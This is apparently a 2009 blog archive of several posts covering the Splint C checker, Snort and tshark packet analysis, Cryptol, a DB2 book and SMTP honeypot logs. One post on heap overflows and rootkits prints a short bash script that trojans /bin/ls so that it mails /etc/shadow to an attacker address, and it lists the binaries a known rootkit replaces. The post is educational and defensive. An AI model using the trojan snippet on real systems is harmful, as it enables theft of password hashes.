Splint the static C code checker

3 05 2009

Splint is this great tool to statically analyze C code. Splint is an evolution of Lint. Lint makes analysis of C code and verifies unused declarations, type inconsistencies, use before definitions, unreachable code, ignored return values, execution path with no return and infinite loops. However, Lint was not a sufficiently powerful tool. Splint was created as a descendant of Lint allowing annotations in C code, so, it do more checks than its predecessor. In this post I will present some verifications that Splint does, and show the philosophy and how to use it. Splint allows annotations on functions, variables, parameters and types.

Undefined Variables

Splint detects instances where the value of a variable is used before it is defined. Anyway, many static analyzers can also do this, it is a very basic check. However, thanks to the splint annotations supports, they can be used to describe what storage must be defined and what storage must be undefined at interface points, this means that all storage reachable from a global variable, parameter to a function, or function return value is defined before and after the function call.

A special case of undefined variables is undefined function parameters. Sometimes we do a certain C function that return values, or change parameters values. The out annotation denotes a pointer to storage that may be undefined. Splint have a great storage model, so does not report an error when a pointer to allocated but undefined storage is passed as an out parameter. If in the body of a function an outparameter is allocated but not bounded to a value Splint reports an error. You can see out as an parameter that will be defined inside a function. The opposite happens to the in annotation, this can be used to denote a parameter that must be completely defined.
Here is a small example of it:

extern void setVal (/*@out@*/ int *x);
extern int getVal (/*@in@*/ int *x);
extern int mysteryVal(int *x);

int dumbfunc(/*@out@*/ int *x, int i) {
if (i > 3)
11         return *x;
else if (i > 1)
13         return getVal (x);
else if (i == 0)
15         return mysteryVal (x);
else {
18         setVal (x);
19         return *x;
}
}


And here it is the output of Splint:

> splint usedef.c
usedef.c:11: Value *x used before definition
usedef.c:13: Passed storage x not completely defined
(*x is undefined): getVal (x)
usedef.c:15: Passed storage x not completely defined
(*x is undefined): mysteryVal (x)
Finished checking --- 3 code warnings


As you can see, no error is reported for line 18, because the incomplete defined storage x is passed to a function that will define it, so we can return *x with no problems.

Types

Strong type checking often reveals programming errors. Splint can check primitive C types more strictly and flexibly than typical compilers.

C, does not make types verification. Because for C all basic non numerical types are just int’s (Enum, Pointer, Char). Splint supports stricter checking of built-in C types. The char and enum types can be checked as distinct types, and the different numeric types can be type-checked strictly. Also the primitive char type can be type-checked as a distinct type. If char is used as a distinct type, common errors involving assigning ints to chars are detected.

In Splint, you can always turn off some default verifications, and Splint will assume the C compiler strategy to verify the code. If you run Splint with +charint is on, char types are indistinguishable from ints. So you can make cast’s from int to char or from cahr to int. But never forgot that this can lead to errors, as you can imagine if you do (char) 1000 you will not get an expected result because the characters only go up to 256.

Splint reports errors in the use of Enums, if a value that is not an enumerator member is assigned to the enum type or if an enum type is used as an operand to an arithmetic operator. Anyway you can turn this off, activating the enumint flag and then you can use enums and ints types interchangeably.

Memory Management

About half the bugs in typical C programs can be attributed to memory management problems.

Any C programmer who has already made a reasonable size program, has been confronted with unexpected errors related with memory management problems. This happens basically because C is a low level language so, does not have any system like Java’s garbage collector. All the memory management have to be done by the programmer, so errors may append. Some only appear sporadically, and some may only be apparent when compiled on a different platform. Splint is able to detect many memory management errors at compile time, like: using storage that may have been deallocated, memory leaks or returning a pointer to stack-allocated storage. This is possible because Splint makes a memory model when is working on the code, anyway I will not talk about this subject.

Splint can see and report deallocating storage when there are other live references to the same storage and failing to deallocate storage before the last reference to it is lost. The solution here is simple, Splint makes an obligation to release storage and attach this obligation to the reference to which the storage is assigned.

For references not shared Splint uses the only annotation to indicate that a reference is the only pointer to the object it points to, here we also use the null annotation to say that the output of malloc could be NULL:

/* @only@ */ /* @null@ */ void * malloc ( size_t size );


Here is a simple example of C annotated code with memory leaks and use after free variables:

1 extern /*@only@*/ int *glob;
/*@only@*/ int *f (/*@only@*/ int *x, int *y, int *z) /*@globals glob;@*/ {
8    int *m = (int *)
9    malloc (sizeof (int));
11   glob = y;   //Memory leak
12   free (x);
13   *m = *x;   //Use after free
14    return z;   //Memory leak detected
}


Here is the Splint output for the file above:

> splint only.c
only.c:11: Only storage glob (type int *) not released before assignment: glob = y
only.c:1: Storage glob becomes only
only.c:11: Implicitly temp storage y assigned to only: glob = y
only.c:13: Dereference of possibly null pointer m: *m
only.c:8: Storage m may become null
only.c:13: Variable x used after being released
only.c:12: Storage x released
only.c:14: Implicitly temp storage z returned as only: z
only.c:14: Fresh storage m not released before return
only.c:9: Fresh storage m allocated


Splint errors and warnings are very human readable, so you just have to read them to understand.
The first warning says that variable glob was not released (we say, in line 1, that it is only) before the assignment. In line 13 we have a dereference of possibly null pointer, because in line 12 we have done free to x variable, an now we want to use it’s value. As you can see, is very easy to understand the output of Splint.

Splint can also make verifications in stack based references. A memory error occurs if a pointer into stack is live after the function returns. Splint detects errors involving stack references exported from a function through return values or assignments to references reachable from global variables or actual parameters.
No annotations are needed to detect stack reference errors. It is clear from declarations if storage is allocated on the function stack.

Here is an example of stack-allocated storage:

int *glob;

int *f (int **x) {
int sa[2] = { 0, 1 };
int loc = 3;
9   glob = &loc;
10  *x = &sa[0];
12  return &loc;
}


And here is the Splint output:

> splint stack.c
stack.c:12: Stack-allocated storage &loc reachable from return value: &loc
stack.c:12: Stack-allocated storage *x reachable from parameter x
stack.c:10: Storage *x becomes stack
stack.c:12: Stack-allocated storage glob reachable from global glob
stack.c:9: Storage glob becomes stack


Control Flow

In order to avoid certain errors, Splint have to understand the control flow of the program, so Splint do some checks related to control flow. Many of these checks are possible because of the extra information that is known in annotations. Without this additional information Splint assumes that all functions return and execution continues normally.

noreturn annotation is used to denote a function that never returns.

extern /* @noreturn@ */ void fatalerror ( char *s);


We also have maynoreturn and alwaysreturns annotations, but Splint must assume that a function returns normally when checking the code and doesn’t verify if a function really returns.

To describe non-returning functions the noreturnwhentrue and noreturnwhenfalse mean that a function never returns if the first argument is true or false.

/* @noreturnwhenfalse@ */ void assert (/* @sef@ */ bool /* @alt int@ */ pred );


The sef annotation denotes a parameter as side effect free, and the alt int indicate that it may be either a Boolean or an integer.

Undefined Behavior

The order which side effect take place in C is not entirely defined by the code.

A sequence point is some point in the C code where it is guaranteed that all side effects of previous evaluations have been performed.
An example of sequence points is:

• a function call (after the arguments have been evaluated)
• at the end of a if, while, for or do statement
• a &&, || and ?

Here is a simple C program that have undefined behavior.

extern int glob;
extern int mystery (void);
extern int modglob (void) /*@globals glob@*/ /*@modifies glob@*/;

int f (int x, int y[]) {
11    int i = x++ * x;
13    y[i] = i++;
14    i += modglob() * glob;
15    i += mystery() * glob;
16    return i;
}


And here is the Splint output:

> splint order.c
order.c:11: Expression has undefined behavior (value of right operand modified by left operand): x++ * x
order.c:13: Expression has undefined behavior (left operand uses i, modified by right operand): y[i] = i++
order.c:14: Expression has undefined behavior (value of right operand modified by left operand): modglob() * glob
order.c:15: Expression has undefined behavior (unconstrained function mystery used in left operand may set global variable glob used in right operand): mystery() * glob


Regard control flow, Splint has more options to check C code. I will not talk about all of them here.

Buffer Sizes

Buffer overflow errors are a particularly dangerous type of bug in C, they are responsible for half of all security attacks. This is happens because C does not perform runtime bound checking (for performance reasons), and so attackers can exploit program bugs to, for example, gain full access to a machine.

Splint models blocks of memory using two properties:
maxSet, maxSet(b) denotes the highest address beyond b that can be safely used as lvalue, for instance:

char buffer[MAXSIZE] we have maxSet(buffer) = MAXSIZE - 1


and maxRead, maxRead(b) denotes the highest index of a buffer that can be safely used as rvalue.

When a buffer is accessed as an lvalue, Splint generates a precondition constraint involving the maxSet property and when a buffer is accessed as an rvalue, Splint generates a precondition constraint involving the maxRead property.

We can use this two properties in buffer sizes annotations, this annotations uses the clause requires and ensures just like JML, VDM and Frama-C. When a function with requires clause is called, the call site must be checked to satisfy the constraints implied by requires.

Here is an example of its use:

void /* @alt char * @*/ strcpy
(/* @out@ */ /* @returned@ */ char *s1 , char *s2)
/* @modifies * s1@ */
/* @requires maxSet (s1) >= maxRead (s2) @*/


This is a possible annotation for strcpy standard library C function. We say that s1 is the return value of the function (returned), and that the pointer to s1 is the only one (only). We also say that this function modifies s1 and we specify the pre and post conditions.

Splint can also do bound checking. This is more complex than other checks done by Splint, so, memory bound warnings contain extensive information about the unresolved constraint as you can see in this example:

int buf [10];
buf [10] = 3;

setChar .c :5:4: Likely out -of - bounds store : buf [10]
Unable to resolve constraint : requires 9 >= 10
needed to satisfy precondition : requires maxSet ( buf @ setChar .c :5:4) >= 10


The ultimate test: wu-ftpd

wu-ftpd version 2.5.0 was about 20.000 lines of code and took less than four seconds to check all of wu-ftpd on a 1.2-GHz Athlon machine. Splint detected the known flaws as well as finding some previously unknown flaws (!)

One of the problems of these automatic static analysis tools is that it can produce false problems.
Running Splint on wu-ftpd without adding annotations produced 166 warnings for potential out-of-bounds writes. After adding 66 annotations, it produced 101 warnings: 25 of these indicated real problems and 76 were false.

Pros and Cons

Pros:

• Lightweight static analysis detects software vulnerabilities
• Splint definitely improves code quality
• Suitable for real programs…

Cons:

• …although it produces more warning messages that lead to confusion
• It won’t eliminate all security risks
• Hasn’t been developed since 2007, they need new volunteers

Conclusions

No tool will eliminate all security risks, lightweight static analysis tools (Splint) play an important role in identifying security vulnerabilities.

Here is the presentation about that subject:

Outroduction

All the examples provide here is from the Splint manual.

Capture and dissect network traffic

1 04 2009

Currently I am doing research at the University of Minho in the group of distributed systems, with duration of one year. My job is to find a way to identify specific links between a user and a distributed system. The general idea is to draw a map of services in a distributed system. This post only refers to the first milestone.

The proposal was to make such a system using Snort.

Snort

Snort is a Network intrusion detection system, that means with Snort you can detect malicious activity in your network. We can detect many types of network attacks. We can identify DoS, DDoS attacks, port scans, cracking attempts, and much more.

Snort can operate in two different ways. We can set up Snort to run in passive mode, putting it to listen in promiscuous mode. That is, because Ethernet network switches send traffic to all computers connected to itself, we get traffic addressed to other machines on the network. To do this we only need to connect to the network and turn Snort on in our machine, no one knows that we are recording every traffic (including traffic destined for other computers).

Snort may also run in active mode. This “active” is not able to modify the data channel, but to be able to be installed in a network, a router for example and reap more information than in passive mode. Thus it makes sense to use the capacity of rules that Snort supports, to filter the traffic that it read.

To do this, Snort capture all packets that pass the network and interprets each. As the rules we have defined Snort tries to find these patterns in each packet, or each set of packets and take certain actions for each of them.

For example, if a large number of TCP requests reach a particular host, to a large number of ports in a short space of time we probably are the target of a port scan. NIDS like Snort know how to find these patterns and alerting the network administrator.

Objective

Our aim was to use Snort to capture all traffic into passive mode.

root@pig:# snort -u snort -g snort -D -d -l /var/log/snort -c /etcsnort/snort.debian.conf -i eth0

We are saving the logs in binary (tcpdump format), for that I use the “-d -l /dir/” flags. I prefer to save all the packets into binary because is more easier to parse, than the structure of files and directories that Snort creates by default.

I started by trying to use some language that advised me to try to do the parsing of the file created by snort. Initially started to use python, but only find a tcpdump parser and could not get more than one file translated in tcpdump to hexadecimal.
After that I tried to use Haskell and I was amazed!

House is a Haskell Operative System done by The Programatica Project.

This is a system than can serve as a platform for exploring various ideas relating to low-level and system-level programming in a high-level functional language.

And indeed helped me a lot in doing my job. This project have already done a lot of parsers for network packets. It implements the Ethernet, IPv4, IPv6, TCP, UDP, ICMP, ARP and I think is all.

The libpcap (tcpdump parser) is already implemented in Haskell too, so is very simple to parse a complete packet:

getPacket :: [Word8] -> InPacket
getPacket bytes =  toInPack $listArray (0,Prelude.length bytes-1)$ bytes

-- Ethernet | IP | TCP | X
getPacketTCP :: [Word8] -> Maybe (NE.Packet (NI4.Packet (NT.Packet InPacket)))
getPacketTCP bytes = doParse \$ getPacket bytes :: Maybe (NE.Packet (NI4.Packet (NT.Packet InPacket)))


As you can see is too easy to have a compete structure of a packet parsed with this libraries. The problem is that they don’t have already implemented a application packet parser. So, according to that image:

This is the level of depth we can go with this libraries. What is very good, but not perfect for me :S

My supervisor told me to start searching a new tool to do this job. I was sad because I could not do everything in Haskell. But it is already promised that I will continue this project in Haskell. You can see the git repo here.

I find tshark, a great tool to dissect and analyze data inside tcpdump files.

The power of tshark

tshark is the terminal based Wireshark, with it we can do everything we do with wireshark.

Show all communications with the IP 192.168.74.242

root@pig:# tshark -R "ip.addr == 192.168.74.242" -r snort.log

...
7750 6079.816123 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Key Exchange Init
7751 6079.816151 192.168.74.242 -> 193.136.19.96 TCP ssh > 51919 [ACK] Seq=37 Ack=825 Win=7424 Len=0 TSV=131877388 TSER=1789588
7752 6079.816528 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Key Exchange Init
7753 6079.817450 193.136.19.96 -> 192.168.74.242 TCP 51919 > ssh [ACK] Seq=825 Ack=741 Win=7264 Len=0 TSV=1789588 TSER=131877389
7754 6079.817649 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Diffie-Hellman GEX Request
7755 6079.820784 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Diffie-Hellman Key Exchange Reply
7756 6079.829495 193.136.19.96 -> 192.168.74.242 SSHv2 Client: Diffie-Hellman GEX Init
7757 6079.857490 192.168.74.242 -> 193.136.19.96 SSHv2 Server: Diffie-Hellman GEX Reply
7758 6079.884000 193.136.19.96 -> 192.168.74.242 SSHv2 Client: New Keys
7759 6079.922576 192.168.74.242 -> 193.136.19.96 TCP ssh > 51919 [ACK] Seq=1613 Ack=1009 Win=8960 Len=0 TSV=131877415 TSER=1789605
...


Show with a triple: (time, code http, http content size), separated by ‘,’ and between quotation marks.

root@pig:# tshark -r snort.log -R http.response -T fields -E header=y -E separator=',' -E quote=d -e frame.time_relative -e http.response.code -e http.content_length

...
"128.341166000","200","165504"
"128.580181000","200","75332"
"128.711618000","200","1202"
"149.575548000","206","1"
"149.719938000","304",
"149.882290000","404","338"
"150.026474000","404","341"
"150.026686000","404","342"
"150.170295000","304",
"150.313576000","304",
"150.456650000","304",
...


Show a tuple of arity 4 with: (time, source ip, destination ip, tcp packet size).

root@pig:# tshark -r snort.log -R "tcp.len>0" -T fields -e frame.time_relative -e ip.src -e ip.dst -e tcp.len

...
551.751252000   193.136.19.96   192.168.74.242  48
551.751377000   192.168.74.242  193.136.19.96   144
551.961545000   193.136.19.96   192.168.74.242  48
551.961715000   192.168.74.242  193.136.19.96   208
552.682260000   193.136.19.96   192.168.74.242  48
552.683955000   192.168.74.242  193.136.19.96   1448
552.683961000   192.168.74.242  193.136.19.96   1448
552.683967000   192.168.74.242  193.136.19.96   512
555.156301000   193.136.19.96   192.168.74.242  48
555.158474000   192.168.74.242  193.136.19.96   1448
555.158481000   192.168.74.242  193.136.19.96   1400
556.021205000   193.136.19.96   192.168.74.242  48
556.021405000   192.168.74.242  193.136.19.96   160
558.874202000   193.136.19.96   192.168.74.242  48
558.876027000   192.168.74.242  193.136.19.96   1448
...


Show with a triple: (source ip, destination ip, port of destination ip).

root@pig:# tshark -r snort.log -Tfields  -e ip.src -e ip.dst -e tcp.dstport

...
192.168.74.242  193.136.19.96   37602
192.168.74.242  193.136.19.96   37602
193.136.19.96   192.168.74.242  22
192.168.74.242  193.136.19.96   37602
193.136.19.96   192.168.74.242  22
193.136.19.96   192.168.74.242  22
192.168.74.242  193.136.19.96   37602
192.168.74.242  193.136.19.96   37602
192.168.74.242  193.136.19.96   37602
193.136.19.96   192.168.74.242  22
193.136.19.96   192.168.74.242  22
193.136.19.96   192.168.74.242  22
193.136.19.96   192.168.74.242  22
192.168.74.242  193.136.19.96   37602
192.168.74.242  193.136.19.96   37602
...


Statistics

Hierarchy of protocols

root@pig:# tshark -r snort.log -q -z io,phs
frame                                    frames:7780 bytes:1111485
eth                                    frames:7780 bytes:1111485
ip                                   frames:3992 bytes:848025
tcp                                frames:3908 bytes:830990
ssh                              frames:2153 bytes:456686
http                             frames:55 bytes:19029
http                           frames:5 bytes:3559
http                         frames:3 bytes:2781
http                       frames:2 bytes:2234
http                     frames:2 bytes:2234
data-text-lines                frames:10 bytes:5356
tcp.segments                     frames:3 bytes:1117
http                           frames:3 bytes:1117
media                        frames:3 bytes:1117
udp                                frames:84 bytes:17035
nbdgm                            frames:50 bytes:12525
smb                            frames:50 bytes:12525
mailslot                     frames:50 bytes:12525
browser                    frames:50 bytes:12525
dns                              frames:34 bytes:4510
llc                                  frames:3142 bytes:224934
stp                                frames:3040 bytes:182400
cdp                                frames:102 bytes:42534
loop                                 frames:608 bytes:36480
data                               frames:608 bytes:36480
arp                                  frames:38 bytes:2046


Conversations

We use: -z conv,TYPE,FILTER

TYPE could be:

• eth,
• tr,
• fc,
• fddi,
• ip,
• ipx,
• tcp,
• udp

And the filters are used to restrict the statistics.

root@pig:# tshark -r snort.log -q -z conv,ip,tcp.port==80
================================================================================
IPv4 Conversations
Filter:tcp.port==80
|           | |    Total    |
|Frames Bytes | |Frames Bytes | |Frames Bytes |
193.136.19.148  192.168.74.242 141    13091    202   259651    343   272742
192.168.74.242  128.31.0.36     22     6858     28     4784     50    11642
================================================================================


IO

We use: -z io,stat,INT,FILTER,…,FILTER

root@pig:# tshark -r snort.log -q -z io,stat,300,'not (tcp.port=22)'
===================================================================
IO Statistics
Interval: 300.000 secs
Column #0:
|   Column #0
Time            |frames|  bytes
000.000-300.000    2161    543979
300.000-600.000    1671    264877
600.000-900.000     508     46224
900.000-1200.000     185     12885
1200.000-1500.000     201     14607
1500.000-1800.000     187     13386
1800.000-2100.000     189     13887
2100.000-2400.000     187     13386
2400.000-2700.000     189     13887
2700.000-3000.000     187     13386
3000.000-3300.000     185     12885
3300.000-3600.000     189     13887
3600.000-3900.000     210     15546
3900.000-4200.000     189     13887
4200.000-4500.000     187     13386
4500.000-4800.000     185     12885
4800.000-5100.000     189     13887
===================================================================


Conclusion

With tshark we could do everything we want to know what is inside a network packet. The trick is to understand the statistics that tshark generate, and know how to ask it.

Now my work will get a machine to run Snort in an active mode and begin to understand how to use Snort to do all this work of collecting information.

If you feel interested and understand Portuguese, see the presentation:

Cryptol the language of cryptography

1 04 2009

Pedro Pereira and I are working on a new project in the Masters. The second half of the Masters is composed of a single project suggested by a company. Some companies are forming partnerships in the Masters formal methods, including: the Critical software, SIG and Galois. We chose the Galois because we also are in the area of cryptography and we already knew some work of some people from this company.

The project suggested by Galois was study the Cryptol as a language of specification of cryptographic algorithms. The cipher we used for this study is the SNOW 3G (The SNOW website), later on I will talk about the specification of this cipher. In this post I am only interested to show the language.

I’m going to show you some details about the language. This post is not intend to be a exhaustive explanation of Cryptol, if you looking for that you can go directly to the manuals. This post only relates my experience, and what I like it most with the language.

Overview

Cryptol is a high-level language that is geared to deal with low-level problems. Is a Domain-specific language to design and implement cryptographic algorithms.
This language has a high percentage of correctness of the implementation of a cipher, because it implements type inference, so we can say that a big part of the language implements correctness. This correctness is also achieved thanks to the architecture of the language – functional. We don’t have side effects – a function only return something inside is codomain.
In Cryptol we have this philosophy that says that everything is a sequence. This is very useful because we are working with low level data (array of bits), so we use sequences to represent that arrays. We can have nested sequences to have a more structured representation of data. For example, we can simply transform a 32-bit sequence in a 4 1-byte sequence.
The size of this sequences could be implemented as finite or infinite, as we going to see later in this post. Because Cryptol is a high-level language we can also implement polymorphic functions, most of the primitive functions are implemented in polymorphic mode. The way we have to navigate throw the sequences is using recursion, or sequences comprehension, and with these two techniques we can implement recurrences.

If you are a Haskell programmer you just need the next section to learn Cryptol. This language is so look a like with Haskell that even the philosophy seems to have a lot in commune.

Types in Cryptol

The type $[32]$ means that you have a sequence of 32-bit size. All the types in Cryptol are size oriented. The unit is the $Bit$, that you can use to represent $Bool$. To represent a infinite sequence we use the reserved word $inf$, and we write: $[inf]$ to represent that.

If you want to generate a infinite sequence, we use the syntactic sugar of the sequences like that: $[1~..]$. Cryptol will infer this sequence as type

$[1~..]~:~[inf][1]$

That means this sequence have infinite positions of 1-bit words. The type inference mechanism will always optimize the size that he needs, to represent the information.
So, it infer the type of $[100~..]$ as:

$[100~..]~:~[inf][7]$

Because, it “knows” that needs only 7-bits to represent the decimal $100$. But if you need more, you can force the type of your function.
We implement polymorphism in our types, if we have:

$f~:~[a]b~\rightarrow~[a]b$

This means, that the function $f$ have polymorphism over $b$, because we say that it domain is one sequence of size $a$ of type $b$, and it codomain also. Here we could also see: $f~:~[a][b]c$ meaning that $f$ is a constant of sequences of size $b$ of type $c$, $a$ times.

So, lets talk about some primitive functions in Cryptol, and its types. The $tail$ function have the following type in Cryptol:

$tail~:~\{a~b\}~[a+1]b~\rightarrow~[a]b$

As we can see, Cryptol is so size oriented, that we can use arithmetic operators in types. We can probably infer what this function does just from it type: $tail$ works for all $a$ and $b$ such that if we have one sequence os size $a+1$ of type $b$ it returns one sequence of size $a$ of same type. In fact this function removes the first element of one sequence.

Because of this size oriented philosophy a lot of functions, that change the size of the sequences can be read just from the type.

As you can see in the following list of Cryptol primitive function:

$drop~:~\{ a~b~c \}~( fin~a ,~a~\geq~0)~\Rightarrow~(a ,[ a + b ]~c )~\rightarrow~[ b ]~c$
$take~:~\{ a~b~c \}~( fin~a ,~b~\geq~0)~\Rightarrow~(a ,[ a + b ]~c )~\rightarrow~[ a ]~c$
$join~:~\{ a~b~c \}~[ a ][ b ] c~\rightarrow~[ a * b ]~c$
$split~:~\{ a~b~c \}~[ a * b ] c~\rightarrow~[ a ][ b ]~c$
$tail~:~\{ a~b \}~[ a +1] b~\rightarrow~[ a ]~b$

Recursion and Recurrence

Cryptol implements Recursion, just like a lot of functional languages do.

Imagine the fibonacci function definition:

It implementation in Crytol is exactly the same as defined mathematically.

fib : [inf]32 -> [inf]32;
fib n = if n == 0 then 0 else if n == 1 then 1 else fib (n-1) + fib (n-2);

Cryptol uses recursion to permit us to iterate throw sequences.

But, If you prefer you can implement a more functional algorithm of fibonacci function in Cryptol:

fib : [inf]32 -> [inf]32;
fib n = fibs @ n;
where {
fibs : [inf]32;
fibs = [0 1] # [| x + y || x <- drop (1,fibs) || y <- fibs |];
};

Here, as you can see, we define a infinite list $fibs$ of all the fibonacci numbers, by calling the $fibs$ inside the sequences comprehension $fibs$, this is called a recurrence, and you can use that too in Cryptol.

Cryptol vs C

I’m going to show you some part of the implementation of SNOW 3G in C. This is a function called $MUL_{\alpha}$

MULa : [8] -> [32];
MULa(c) = join ( reverse [
( MULxPOW(c, 23 :[32], 0xA9) )
( MULxPOW(c, 245:[32], 0xA9) )
( MULxPOW(c, 48 :[32], 0xA9) )
( MULxPOW(c, 239:[32], 0xA9) ) ] );

/* The function MUL alpha.
Input c: 8-bit input.
Output : 32-bit output.
See section 3.4.2 for details.
\*/
u32 MULalpha(u8 c) {
return
((((u32)MULxPOW(c,23, 0xa9)) << 24 ) |
(((u32)MULxPOW(c, 245,0xa9)) << 16 ) |
(((u32)MULxPOW(c, 48,0xa9)) << 8 ) |
(((u32)MULxPOW(c, 239,0xa9)))) ;
}


You can see that in Cryptol we just say that we want to work with a 32-bit word, and we don’t need to do any shift to our parts of the word. We just join them together. We reverse the sequence, because Cryptol stores words in little-endian, and we want to keep the definition like the specification.

This is a very simple function, so the result in C is not so that different. But if we have a more complex function, we were going to start having a nightmare to write that in C.

Conclusion

Well, the conclusion is that Cryptol is a language that really help to write low-level algorithms. With Cryptol the specification is formal and easier to read than other languages. A value of Cryptol is that the code can be converted to other languages, such as VHDL and C.

If you’re interested, take a look at the presentation that we did.

Livro Getting Started with DB2

18 03 2009

Ao fim de quase um ano de traduções e revisões, já se encontra disponível para download a versão portuguesa do livro Getting Started with DB2. Para todos os que estiverem interessados em começar a aprender DB2 podem desde já fazer o download do livro.

22 01 2009

Intro

This post is the continuation of Tracing the attack – Part I. And this post is the final one, of this stack.
Here I’m gonna to talk about the Heap/BSS Overflow and Rootkits.

Heap

In the Stack, the memory is allocated by kernel (as explained in Part I). In the other hand the Heap is a structure where the program can dynamically allocate memory. With the use of malloc(), realloc() and calloc() functions.

BSS segment

BSS stands for Block Started by Symbol and is used by compilers to store static variables. This variables are filled with zer-valued data at the start of the program. In C programing language all the not initialized and declared as static variables are placed in the BSS segment.

Heap/BSS Overflow

As a simple example, extracted from w00w00 article, to demonstrate a heap overflow:

   /* demonstrates dynamic overflow in heap (initialized data) */
#define BUFSIZE 16
#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

int main()
{
u_long diff;
char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

diff = (u_long)buf2 - (u_long)buf1;
printf("buf1 = %p, buf2 = %p, diff = 0x%x bytesn", buf1, buf2, diff);

memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '';

printf("before overflow: buf2 = %sn", buf2);
memset(buf1, 'B', (u_int)(diff + OVERSIZE));
printf("after overflow: buf2 = %sn", buf2);

return 0;
}


Now, when we execute this code with parameter 8:

   [root /w00w00/heap/examples/basic]# ./heap1 8
buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA


This works like that, because buf1 overruns its boundary and write data in buf2 heap space. This program don’t crash because buf2 heap space still a valid segment.

To see a BSS overflow we just have to replace the:
‘char *buf = malloc(BUFSIZE)’, by: ‘static char buf[BUFSIZE]’

If the heap is non-executable that will prevent the use of function calls there. But even so, that won’t prevent heap overflows.

I won’t talk anymore about that subject in this post, if you want to learn more about that you can see the w00w00 article, and some-more from the references section (at the end of this post).

Rootkits

After gaining access the target machine (using an exploit for example), the attacker must ensure will continue to have access even after the victim has fixed the vulnerability, and without it knows that the system remains compromised. And the attacker can achieve this through the installation of a rootkit on the target machine.
A rootkit is basically a set of tools (backdoors and trojan horses) designed with the aim to provide absolute control of the target machine. A backdoor is a way to authenticate a legitimate machine, providing remote access the same while trying to remain undetected. For example, you can take the form of a program or a change in a program already installed. A trojan horse (or just textittrojan) is usually a program that supposedly plays a role but which actually also plays other malicious functions without the knowledge of the victim.
Then we show a very simple example of a bash script that creates a possible trojaned ls:

#!/ bin/bash
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail attacker@domain.com" > /bin/ls
/bin/echo "/ bin/ls.old" >> /bin/ls
chmod +x /bin/ls


It is clear that we are not considering the fact that the ls can receive arguments, this is just for example purposes. And is good to show an example of the objective of a trojan.

Usually the use of a real trojan would install a modified versions of several binary (lsof, ps, etc). The idea of changing this programs is to hide the trojan itself. With a ps changed command, the user could not see the trojan process running.

Here is a list of the changed programs when you install Linux Rootkit 4:

bindshell	port/shell type daemon!
chfn		Trojaned! User > r00t
chsh		Trojaned! User > r00t
crontab     Trojaned! Hidden Crontab Entries
du		Trojaned! Hide files
find		Trojaned! Hide files
fix		File fixer!
ifconfig	Trojaned! Hide sniffing
inetd		Trojaned! Remote access
killall		Trojaned! Wont kill hidden processes
linsniffer	Packet sniffer!
ls             Trojaned! Hide files
netstat      Trojaned! Hide connections
passwd	Trojaned! User > r00t
pidof		Trojaned! Hide processes
ps		Trojaned! Hide processes
rshd		Trojaned! Remote access
sniffchk	Program to check if sniffer is up and running
syslogd	Trojaned! Hide logs
tcpd		Trojaned! Hide connections, avoid denies
top		Trojaned! Hide processes
wted		wtmp/utmp editor!
z2		Zap2 utmp/wtmp/lastlog eraser!


There are many rootkits over the network, the most common, compromise Windows and Unix systems.

Detecting and removing rootkits

When someone suspect that his system have been compromised, the best thing wold be use some tool to detect and remove rootkits. We have, for Linux: chkrootkit and rkhunter and for Windows you can use the RootkitRevealer.

As curious, I would like to mention that in 2005, Sony BMG put a rootkit in several CDs of music that is self-installed (without notice) on computers where the CDs were read, for more about this.

Outroduction

As we saw, an attacker start of using a scanner against a particular range of ip’s, would then see if there are services available, then do a dictionary attack using the country’s victim language, extracted from the IP. Or could also detect vulnerabilities in the system, that he could use to gain access. After having access to the computer the attacker terminate by installing a rootkit to gain permanent access to this system.

As a bonus I also explain some minimalistic examples of how can someone, that have physical access to a system, can gain root access to it exploiting some programs that are running in that system.

This area is so vast that is still impossible to predict the ways to do an attack. Imagine that an attacker gain access to a computer, but they don’t have root credentials. Attackers probably will try to exploit some programs that are running in that systems…

SMTP Attacks

11 01 2009

This post is part of the results discovered when the honeypot was running. This port concerns to SMTP connections to the honeypot.

SMTP

SMTP stands for Simple Mail Transfer Protocol, defined in RFC 2821, it is a standard protocol that allows transmission e-mails through IP networks.
Typically the SMTP is used on the server side to send and receive e-mail messages while on the client side is only used to send e-mails. To receive clients use the protocol POP3 or Internet Message Access Protocol (IMAP).

In the following chart I will show the activity that were on our honeypot, throw port 25, while our honeypot was on:

The e-mail client (SMTP client) connects to port 25 of the e-mail server, this is the default SMTP port, and sends an EHLO to the server indicating his identity. The server opens the session and provide a list of the extensions it supports in a machine-readable format.

S: 220 bps-pc9.local.mynet Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at  Dom Jan 11 19:32:00 WET 2009
C: EHLO localhost
S: 250-bps-pc9.local.mynet Hello [1]
S: 250-TURN
S: 250-ATRN
S: 250-SIZE
S: 250-ETRN
S: 250-PIPELINING
S: 250-DSN
S: 250-ENHANCEDSTATUSCODES
S: 250-8bitmime
S: 250-BINARYMIME
S: 250-CHUNKING
S: 250-VRFY
S: 250-XEXCH50}
S: 250 OK


The 250 code is the best message from all available and means: Requested action taken and completed. In fact this EHLO message is an extension to SMTP (ESMTP), according to RFC1869. Because so, some old servers may not support EHLO command, and in that case the client must use HELO.

Spammers can pass throw unchecked HELO commands, hitting non fully qualified domain names to identify herself.
As we have seen in the honeypot log files, many attempts from spammers to do that:

EHLO user-3i39rqqo1r
...
EHLO premier-ksxhhv6
...
EHLO mta101
...
EHLO msg-g09pmirpcam


We can reduce this attempts just requiring the identity between […], and configuring SMTP server to check that.
Another idea is to check the HELO/EHLO argument and verify if it does not resolve in DNS. There are lot more kind of validations to resolve this problem, but unfortunately seems that a lot of SMTP administrators simply ignore section 3.6 of RFC2821.
Of course we don’t implement that in our honeypot, because we want to attract all kind of people to interact with our system.

Here is some statistics from identification attempts to the SMTP server in our honeypot:

And here you can see the preferred command from attackers:

So, we can really do something to stop spreading spamm from the networks…

